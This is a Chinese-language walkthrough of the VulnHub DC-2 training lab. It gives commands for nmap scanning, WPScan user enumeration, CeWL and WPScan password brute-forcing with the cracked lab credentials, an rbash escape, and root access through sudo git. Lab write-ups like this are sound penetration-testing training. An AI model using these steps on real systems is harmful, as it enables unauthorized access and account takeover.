一、环境搭建
1、DC-2是另一个专门建造的易受攻击的实验室,目的是在渗透测试领域获得经验。
与最初的DC-1一样,它的设计考虑到了初学者。
Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。
和DC-1一样,有五个flag最终目标是找到root用户主目录中的flag
2、下载靶场地址
https://www.vulnhub.com/entry/dc-2,311/
3、已知我们的目标是找到root用户主目录中的flag。然后把我们所需的应用程序打开,要注意的是网络设置,要与攻击机kali在同一网段,要么就是都用NAT模式。
二、靶场渗透
1、进入kali后,输入sudo su进入root权限
2、信息收集寻找靶机真实IP //nmap -sP192.168.35.1/24
扫描网段中有哪些主机在线,使用-sP参数,不扫描端口,只扫描存活主机。本质上是Ping扫描,能Ping通有回包,就判定主机在线。
3、信息收集探测端口和服务//nmap -A -p- -v 192.168.35.130
发现开放了80端口,存在web服务,Apache/2.4.10,
发现开放了7744端口,开放了ssh服务,OpenSSH 6.7p1
可以看到DC-2开启了80端口和 改了ssh默认端口 改成了7744端口
4、访问web站点
http://192.168.35.130
发现访问不了,且发现我们输入的ip地址自动转化为了dc-2,我们想到dc-2这个域名解析失败,我们需要更改hosts文件,添加一个ip域名指向。
5、修改hosts文件,添加靶机IP到域名dc-2里添加192.168.35.130 dc-2//vim /etc/hosts
添加完成之后,再次访问成功
可以很明显的发现这是一个wordpress的站点
6、发现flag1,翻译大致意思就是暴力破解,账号密码
7、做一个目录扫描//dirb http:dc-2/
打开链接进入登录页面
8、用户名枚举
在应用系统登录的过程中,当输入错误的用户名信息时,应用程序将反馈相应的诸如“用户不存在”的错误提示,攻击者可通过该提示为依据对用户名进行枚举,猜解出已存在于应用系统的用户名信息,最终攻击者再对已有用户的密码进一步猜解,从而降低暴力破解的成本。
WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能该扫描器可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。同时还可以实现对未加防护的Wordpress站点暴力破解用户名密码。
(1)描wordpress版本//wpscan --url http://dc-2
(2)登录页面尝试登录
随即输入用户名密码,提示用户名不存在,似乎可以进行用户名枚举
(3)首先来个用户枚举,再尝试利用枚举到的用户爆破密码
wpscan --url http://dc-2 --enumerate u
用枚举方法得出三个用户名 admin/ jerry/ tom
9、暴力破解账号密码
根据flag1可以用暴力破解,我们使用cewl生成字典,
Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具。
(1)为了方便大家记录,或者为将来的研究提供参考,Cewl可以将打印出的字典存储为文件。这里可以使用-w参数来将密码字典存储为text文件 //cewl http://dc-2/ -w dc2.txt
(2)使用wpscan进行暴力破解//wpscan --url http://dc-2 --passwords dc2.txt
爆出两个账号
jerry/adipiscing
tom/parturient
(3)登录此站点 //jerry/adipiscing
(4) 登录后台之后,我们看到flag2,点进去之后看到flag2提示信息,翻译就是如果wordpress行不通的话就会一个点,我们之前发现有ssh,我们看看ssh
意思是如果你不能利用WordPress并走捷径,还有另一种方法。
希望你找到了另一个切入点(这里我们想到7744端口,服务是ssh我们使用ssh进行登录)
10、使用ssh进行登录
(1)我们使用tom进行登录,发现可以登录成功,看到flag3.txt
登录ssh //ssh tom@192.168.66.141 -p 7744
(2)这里用less flag3.txt来查看
11、rbash绕过
(1)接下来,尝试rbash绕过
查看可以使用的命令 //echo $PATH
(2)使用ls直接查看目录信息
(3)使用echo来绕过rbash
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
echo /*
12、发现flag4
(1)在jerry的目录发现flag4
(2)查看flag4 //cat flag4.txt 如以下内容大致意思就是还没有结束。猜想需要提权才能获取到最终的flag,并且flag4 提示我们可以使用git,我们可以通过git来提权
(3)使用tom用户无权限运行sudo 我们切换到jerry用户
我们可以看到无需root权限,jerry 可以使用 git //sudo -l
13、提权
(1)查看一下可以使用的root权限命令
find / -user root -perm -4000 -print 2>/dev/null/全部
(2)jerry用户也不可以直接sudo su
(3)使用git命令进行提取
sudo git help status
(4)我们再交互换式中输入 //!/bin/sh ,可以看到我们的命令提示符变成了root
(5)提权成功 //sudo git help status
//whoami
14、提权成功 获得root权限,切换到root目录下发现final-flag.txt
//cd /root
//cat final-flag.txt
到这步就算完成了
扫一扫
1046
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
